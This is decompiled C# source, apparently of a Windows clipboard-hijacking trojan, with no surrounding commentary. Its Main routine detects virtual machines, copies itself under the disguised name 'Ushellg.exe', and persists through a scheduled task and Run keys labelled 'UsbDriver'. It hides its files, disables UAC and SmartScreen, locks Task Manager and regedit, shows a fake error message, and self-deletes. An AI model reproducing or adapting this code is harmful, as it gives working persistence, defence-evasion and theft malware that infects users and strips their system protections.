// Token: 0x06000014 RID: 20 RVA: 0x00002970 File Offset: 0x00000B70 public static bool ToogleSmartScreen(string regpath, string name, string enable) { bool result; try { if (RunCheck.IsUserAdministrator()) { using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryControl.Regview)) { using (RegistryKey registryKey2 = registryKey.OpenSubKey(regpath, RunCheck.StartWin_xSixtyFour())) { try { registryKey2.SetValue(name, enable, RegistryValueKind.String); return(true); } catch { return(false); } } } } result = true; } catch { result = false; } return(result); }
// Token: 0x0600000B RID: 11 RVA: 0x00002660 File Offset: 0x00000860 public static bool CheckMutex() { bool result; Mutex obj = new Mutex(true, RunCheck.GetGUID(), ref result); GC.KeepAlive(obj); return(result); }
// Token: 0x06000012 RID: 18 RVA: 0x000027B8 File Offset: 0x000009B8 public static bool ToogleUacAdmin(string regpath, int locker) { bool result; try { if (RunCheck.IsUserAdministrator()) { using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryControl.Regview)) { using (RegistryKey registryKey2 = registryKey.OpenSubKey(regpath, RunCheck.StartWin_xSixtyFour())) { try { foreach (string name in RegistryControl.FieldsLocal) { try { registryKey2.SetValue(name, locker, RegistryValueKind.DWord); } catch { } } } catch (Exception) { return(false); } return(true); } } } result = true; } catch (Exception) { result = false; } return(result); }
// Token: 0x06000056 RID: 86 RVA: 0x00004278 File Offset: 0x00002478 public static void CopyAndShelduderInizialize() { ProcessControl.KillClipInizialize(); string startUpFromAppDataReserv = GlobalPath.StartUpFromAppDataReserv; string text = Path.Combine(startUpFromAppDataReserv, Path.GetFileName(GlobalPath.AssemblyPath.Replace(GlobalPath.AssemblyPath, "Ushellg.exe"))); RunSystem.Scheduler(false, "minute", 1, "highest", "UsbDriver", "\"" + text + "\""); RegistryControl.RegStartupInizialize(false, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbDriver", text); Directory.Delete(GlobalPath.StartUpFromAppDataReserv); Thread.Sleep(2000); if (!Directory.Exists(startUpFromAppDataReserv) && GlobalDirectory.CreateDirectory(startUpFromAppDataReserv)) { File.Copy(GlobalPath.AssemblyPath, text, false); Thread.Sleep(2000); if (File.Exists(text)) { if (RunCheck.IsUserAdministrator()) { RunSystem.Scheduler(true, "minute", 1, "highest", "UsbDriver", "\"" + text + "\""); RegistryControl.RegStartupInizialize(true, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbNDriver", text); if (!GlobalFile.IsHideOrNo()) { GlobalFile.HideFile(text, FileAttributes.Hidden); return; } } else { RegistryControl.RegStartupInizialize(true, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "UsbNDriver", text); if (!GlobalFile.IsHideOrNo()) { GlobalFile.HideFile(text, FileAttributes.Hidden); } ProcessControl.RunFile(text); } } } }
// Token: 0x06000013 RID: 19 RVA: 0x00002888 File Offset: 0x00000A88 public static bool ToogleTaskMandRegedit(string regpath, int locker) { bool result; try { using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(regpath, RunCheck.StartWin_xSixtyFour())) { using (RegistryKey registryKey2 = registryKey.CreateSubKey("System")) { registryKey2.SetValue("EnableLUA", 0, RegistryValueKind.DWord); registryKey2.SetValue("PromptOnSecureDesktop", 0, RegistryValueKind.DWord); try { foreach (string name in RegistryControl.FiledsSystem) { try { registryKey2.SetValue(name, locker); } catch { } } } catch (Exception) { return(false); } result = true; } } } catch { result = false; } return(result); }
public static void Main() { if (RunCheck.CheckMutex()) { Date date = new Date(); if (date.AntiVm && CheckVirtual.CheckWMI()) { Environment.Exit(0); } if (date.Delay) { Program.Sleeping(RunCheck.ThreadSleep); } if (GlobalPath.AssemblyPath.StartsWith(GlobalPath.StartUpFromAppDataReserv, StringComparison.OrdinalIgnoreCase)) { if (!GlobalFile.IsHideOrNo()) { GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Hidden); } ClipChanger.StartChanger(); return; } new Thread(delegate() { ProcessControl.KillClipInizialize(); }) { IsBackground = true }.Start(); if (date.AddGarbage) { new Thread(delegate() { Garbage.InizializeTrash(500); }).Start(); } if (date.FakeText) { File.WriteAllText(string.Concat(new string[] { "Error.txt" }), GlobalPath.MessageErrorTextForUser); } if (date.AddInSystemRun) { InjReg.CopyAndShelduderInizialize(); RegistryControl.ToogleHidingFolders("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "Hidden", 2); ExpSetting.RefreshExplorer(); if (date.Uac) { RegistryControl.ToogleUacAdmin("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0); } if (date.Smart) { RegistryControl.ToogleSmartScreen("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", "SmartScreenEnabled", "Off"); } if (date.TaskLock) { RegistryControl.ToogleTaskMandRegedit("Software\\Microsoft\\Windows\\CurrentVersion\\Policies", 1); } GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Normal); Liquidation.Inizialize(GlobalPath.BatchFile); Liquidation.SelfDelete("cmd.exe", "/C choice /C Y /N /D Y /T 1 & Del \"" + GlobalPath.GetFileName); return; } if (!GlobalFile.IsHideOrNo()) { GlobalFile.HideFile(GlobalPath.AssemblyPath, FileAttributes.Hidden); ClipChanger.StartChanger(); return; } } else { Environment.Exit(0); } }